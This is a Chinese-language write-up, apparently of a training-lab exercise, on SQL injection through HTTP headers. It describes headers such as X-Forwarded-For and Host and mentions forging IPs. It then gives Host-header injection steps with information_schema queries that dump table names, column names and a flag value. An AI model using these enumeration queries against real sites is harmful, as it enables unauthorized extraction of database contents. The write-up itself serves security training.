概述
HTTP头部详解
User-Agent:使得服务器能够识别客户使用的操作系统,游览器版本等.(很多数据量大的网站中会记录客户使用的操作系统或浏览器版本等存入数据库中)
Cookie:网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密).
X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP]).
Clien-IP:同上,不做过多介绍.
Rerferer:浏览器向 WEB 服务器表明自己是从哪个页面链接过来的.
Host:客户端指定自己想访问的WEB服务器的域名/IP 地址和端口号(这个我本人还没碰到过,不过有真实存在的案例还是写上吧).
HTTP头注入检测
HTTP头存在注入的话,可以使用burpsuite抓包工具,进行抓包注入.(PS:可能需要手工添加相关头参数).
漏洞复现
手工注入(HTTP头部(HOST注入))
用brup对网站抓包,在Host的填入注入sql+#id
通过select database()爆出数据库名pentesterlab
根据数据库名字爆出表名
select group_concat(table_name)from information_schema.tables where table_schema='pentesterlab'
根据表名字爆出字段
select group_concat(column_name)from information_schema.columns where table_name='flag'
最后爆出数据
select group_concat(flag)from flag
最后得到flag:mozhe51f50d验证得到key
最后
以上就是敏感大神为你收集整理的SQL注入漏洞测试(HTTP头注入)的全部内容,希望文章能够帮你解决SQL注入漏洞测试(HTTP头注入)所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复